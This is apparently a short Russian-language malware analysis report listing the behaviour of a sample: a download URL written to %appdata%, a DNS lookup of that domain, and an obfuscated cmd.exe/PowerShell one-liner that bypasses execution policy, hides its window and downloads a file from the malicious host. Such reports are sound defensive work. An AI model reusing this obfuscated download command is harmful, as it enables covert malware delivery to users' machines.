Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^eRs^h^eLl.E^Xe -e^X^EC^u^tio^NP^Olic^Y bYPaS^s -^N^op^RO^f^ile ^-wiNdOwsTy^Le hid^d^EN (nEW-oB^J^E^cT S^y^Stem.Ne^t.^We^Bc^l^I^en^T).DOWNLOAd^fiLE^(^'http://transporingsytw.wa...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "Pow^eRs^h^eLl.E^Xe -e^X^EC^u^tio^NP^Olic^Y bYPaS^s -^N^op^RO^f^ile ^-wiNdOwsTy^Le hid^d^EN (nEW-oB^J^E^cT S^y^Stem.Ne^t.^We^Bc^l^I^en^T).DOWNLOAd^fiLE^(^'http://transporingsytw.wa...' (со скрытым окном)